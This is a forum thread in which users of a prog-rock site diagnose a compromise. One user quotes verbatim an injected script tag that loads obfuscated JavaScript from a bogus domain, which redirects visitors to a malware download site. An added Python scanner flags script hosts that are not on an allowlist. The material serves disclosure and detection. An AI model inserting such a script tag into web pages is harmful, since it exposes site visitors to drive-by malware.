Download denied

Nogbad_The_Bad - Posted: October 06 2022 at 12:29
That's what I'm watching.
Ian

Host of the Post-Avant Jazzcore Happy Hour on Progrock.com

https://podcasts.progrock.com/post-avant-jazzcore-happy-hour/

chopper - Posted: October 06 2022 at 12:13
PA is well behind in its version of the forum software but I don't suppose it's going to get upgraded any time soon since M@x seems to have abandoned it. I'm thinking PA is dying a slow death now, at some point the forum software will stop working (it's probably out of support now).

wiz_d_kidd - Posted: October 06 2022 at 10:08
Apparently PA uses Web Wiz Forums software, version 11.01 (released 10 Sep 2014). The latest version is 12.05 (released 18 Jan 2022). I did a search for Web Wiz vulnerabilities, and found that many versions, beginning with v6.34 and extending thru v10.03, were identified as having vulnerability to cross-site scripting (XSS) attacks. That's a lot of versions for which they never fixed the problem, and it still might be present in v11.01.

https://www.cvedetails.com/cve/CVE-2006-0175/
https://www.exploit-db.com/exploits/28589
https://vulmon.com/searchpage?q=web+wiz+forum
https://www.nmmapper.com/st/exploitdetails/37678/36689/web-wiz-forums-multiple-cross-site-scripting-vulnerabilitiesdownload/



Edited by wiz_d_kidd - October 06 2022 at 10:10
“I don’t like country music, but I don’t mean to denigrate those who do. And for those who like country music, denigrate means to ‘put down.'” – Bob Newhart

wiz_d_kidd - Posted: October 06 2022 at 06:42
I'm not sure how this website works, but the root infection might actually be in the code that generates and updates the pages your browser receives. Removing the bad script from the output pages might not fix the problem, if it gets added again the next time the page refreshes.

So far, this is the status of the pages I'm aware of:

Main - not infected
Forums - infected
Prog Rock Guides - infected
Log In - not infected
Prog Radios - not infected
Prog Links - not infected
FAQ - infected
About Us - not infected

The bad script occurs multiple times on some of these pages, not just once.
“I don’t like country music, but I don’t mean to denigrate those who do. And for those who like country music, denigrate means to ‘put down.'” – Bob Newhart

chopper - Posted: October 05 2022 at 11:21
Presumably this is a fairly simple code change to remove references to that script from the code? Can you tell which pages are impacted?

wiz_d_kidd - Posted: October 05 2022 at 10:12
The website https://new2sportnews.com, and the script (progarchives.js) are still there, but that script invokes another script (of unknown name) at https://advertising-cdn.com which is now offline. I agree with you that they can relaunch a future attack with ease now that they have the "hooks" built into PA.

This all smacks of a Reflected Cross-Site Scripting (XSS) attack, which is explained here: https://portswigger.net/web-security/cross-site-scripting




Edited by wiz_d_kidd - October 05 2022 at 10:18
“I don’t like country music, but I don’t mean to denigrate those who do. And for those who like country music, denigrate means to ‘put down.'” – Bob Newhart

chopper - Posted: October 05 2022 at 07:14
Edge developer tools are throwing up an error on that web page. I'm not an expert on this, but that suggests to me that the script is not being executed; however, that would be the case if the web site is no longer there, but it does leave PA open to future attacks, I would guess.



chopper - Posted: October 05 2022 at 06:50
Wow, that is worrying, thanks for doing this.

Do you know the name of the file that it attempts to download? My anti-virus is not picking anything up but, as you say, this could be a serious problem. It's a shame M@x no longer does anything with PA.

wiz_d_kidd - Posted: October 04 2022 at 10:49
It seems that many users, myself included, have had similar issues. I've spent considerable time digging into the source of the problem. The upshot is that ProgArchives appears to have been hacked!

Back in August, I began getting warnings from Norton Antivirus about a malicious activity (i.e. intrusion detections) when I visit the "Forums", or "Prog Rock Guides" pages. But it doesn't happen on the "About Us" page, or the main page.

The problem is that the HTML code for the Forums and Guides pages (and probably others) contains malicious javascript that looks like this:

    <script src="https://new2sportnews.com/progarchives.js" type="d597b4f971c3864a4c6a613f-text/javascript"></script>

The referenced site, new2sportnews.com, has the appearance of the Nigerian version of The Guardian website. However, it is a bogus web site. It was created in Jan 2021 and had no content until Jun 2022, and the content (according to the internet's Wayback Machine) has not changed since then.

The javascript that is stored at that site (i.e. https://new2sportnews.com/progarchives.js) and is being executed unconditionally by Progarchives, is highly obfuscated to hide its function. I ran it through an "unobfuscator" and confirmed that the script redirects the user to a site called "advertising-cdn.com" which attempts to download a file to the user's computer. The nature of the file is unknown. It could be password stealing, keystroke interception, or other nefarious functions.

I also checked Progarchives using the Wayback Machine and determined that it was clean as of July 19th. Sometime after that is when the system was hacked. Users, myself included, began experiencing problems around Aug 7th.

After an update to my Norton Antivirus, it started completely blocking my access to the forums because I couldn't stop it from executing the malicious javascript. I could disable javascript entirely, but then I could not post or vote in polls. My solution was to install the NoScript add-on to Firefox, and disable scripts specifically for new2sportnews.com. That seems to have worked, at least for now.

The target site, advertising-cdn.com, which contains the downloader script appeared to be a valid site at first, but now it is gone. The hackers could be working on a different attack.

I've contacted PA admins through every means possible. Thanks to Ian (aka Nogbad the Bad) for forwarding private messages that I sent him on Progressive ears. I also contacted the site owners/admins thru GoDaddy, but so far no one has responded.

I hope that our site admins fix this infection before its users are seriously attacked. There is no valid reason that the HTML code for this site should be executing a javascript on a bogus website!

To check for yourself, look at the page source HTML (in Firefox right-click anywhere on a page and select "View Page Source"), then search for new2sportnews.com. If you find it, you've confirmed that the site has been hacked and can potentially cause serious harm to its users (if it hasn't already).

“I don’t like country music, but I don’t mean to denigrate those who do. And for those who like country music, denigrate means to ‘put down.'” – Bob Newhart
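
The page-source check described in this post, and the page-by-page status list in the October 06 post, can be automated. The following is an added example, not part of the original thread or the site's code: it reports every script host outside an allowlist and counts its occurrences per page. The page host www.example-forum.test, the allowed host cdn.example.net and the sample HTML are constructed for illustration.

```python
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ScriptSrcCollector(HTMLParser):
    """Collect the src of every <script> tag, whatever its type attribute."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        # The injected tag quoted in the post carries a non-standard type
        # value, so filtering on type="text/javascript" would miss it.
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())


def host_allowed(host, allowed):
    """True if host equals an allowed host or is a subdomain of one."""
    return any(host == a or host.endswith("." + a) for a in allowed)


def unexpected_script_hosts(html, page_host, allowed_hosts):
    """Return {host: count} for script hosts that are not on the allowlist."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    allowed = {page_host.lower()} | {h.lower() for h in allowed_hosts}
    hits = Counter()
    for src in collector.sources:
        host = urlsplit(src).hostname  # None for relative (same-origin) URLs
        if host and not host_allowed(host, allowed):
            hits[host] += 1
    return dict(hits)


def scan_pages(pages, page_host, allowed_hosts):
    """Run the check over a {page name: html} mapping."""
    return {name: unexpected_script_hosts(html, page_host, allowed_hosts)
            for name, html in pages.items()}


# Constructed sample pages; only the injected tag is taken from the post.
INJECTED = ('<script src="https://new2sportnews.com/progarchives.js" '
            'type="d597b4f971c3864a4c6a613f-text/javascript"></script>')
SAMPLE_PAGES = {
    "Main": '<html><head><script src="/js/site.js"></script>'
            '<script src="//cdn.example.net/lib.js"></script></head></html>',
    "Forums": '<html><head><script src="/js/forum.js"></script>' + INJECTED
              + '</head><body><p>posts</p>' + INJECTED + '</body></html>',
}
```

Calling scan_pages(SAMPLE_PAGES, "www.example-forum.test", {"cdn.example.net"}) flags the Forums page with two occurrences of new2sportnews.com and reports nothing for Main.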

I prophesy disaster - Posted: September 24 2022 at 04:01
I should remark that it was only yesterday's "Download denied" notifications that were caused by the VPN. The original problem that lasted more than a month was not caused by the VPN. I don't use the VPN to visit this site and it was quite by accident without realising that it was still on that it was in use while I was visiting this site yesterday.
 

No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.

I prophesy disaster - Posted: September 23 2022 at 15:52
^ VPN server in London –> "Download denied" notification.
VPN server in Sydney –> "Download denied" notification.
 
So, it appears that the problem is with the VPN.
 



Edited by I prophesy disaster - September 23 2022 at 15:56
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.

I prophesy disaster - Posted: September 23 2022 at 15:44
I just discovered something quite interesting: I have a VPN which I sometimes use and sometimes don't use, depending on what I'm doing. When I'm not using the VPN, I don't get the "Download denied" notification. But when I do use the VPN (server in Los Angeles), I get the notifications. I haven't yet tried the VPN server in other available locations, so I don't know if the problem is with the VPN or the location.
 

No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.

I prophesy disaster - Posted: September 23 2022 at 11:32
^And the "PROG ROCK GUIDES" and "FAQ" links.
 

No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.

I prophesy disaster - Posted: September 23 2022 at 11:25
Originally posted by I prophesy disaster:

not on the database pages

Actually, it does occur when I click on any of the "PROG SUB-GENRES" links.
 

No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.

Cristi - Posted: September 23 2022 at 11:12
Originally posted by I prophesy disaster:

^ This problem is only occurring on the forum pages, not on the database pages. But it does occur every time I click on any link in the forum.
 
How did you solve your problem (if it isn't too involved to say)?
 

I played with the antivirus settings, trial and error. I got it right in the end. 
I don't use Google chrome for PA anymore.

I prophesy disaster - Posted: September 23 2022 at 11:08
^ This problem is only occurring on the forum pages, not on the database pages. But it does occur every time I click on any link in the forum.
 
How did you solve your problem (if it isn't too involved to say)?
 

No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.

Cristi - Posted: September 23 2022 at 10:50
Originally posted by I prophesy disaster:

^ This is the only site where it happens. And there was another topic started by wiz_d_kidd reporting something similar: Intrusion Detected from PA. That topic referred to the same website, but I think the difference might be due to different security software. It is the security software that is producing the notifications.
 

I had some problems a few months ago, but it was my antivirus that didn't let me see any album pages because of "phishing". I solved the problem but it took me a little while. 

I prophesy disaster - Posted: September 23 2022 at 10:47
^ This is the only site where it happens. And there was another topic started by wiz_d_kidd reporting something similar: Intrusion Detected from PA. That topic referred to the same website, but I think the difference might be due to different security software. It is the security software that is producing the notifications.
 

No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.

Cristi - Posted: September 23 2022 at 10:33
^ It does not seem to be PA's fault for what's going on there. I think your browser is stuck on some weird ads, trackers and the like.

I prophesy disaster - Posted: September 23 2022 at 10:26
Originally posted by Cristi:

I've never seen such a thing happen.
Download denied? what download?

That's the notification I get. I have no idea to what "download" is referring. I assume it's something that the https://advertising-cdn.com website is trying to download onto my computer.

Originally posted by Cristi:

Microsoft Edge is not a good browser IMO, even google chrome has gotten worse. 
Try Mozilla Firefox (although it collapsed for me once a few years back) and a new(er) browser called Brave.

I have four browsers on my computer, but I mostly use only two of them: Edge and Chrome. I use Edge for sites that keep me logged on, such as this site, and Chrome for things I'd rather clear my browser history, cookies, etc. I have Firefox but I don't like it.
 

No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.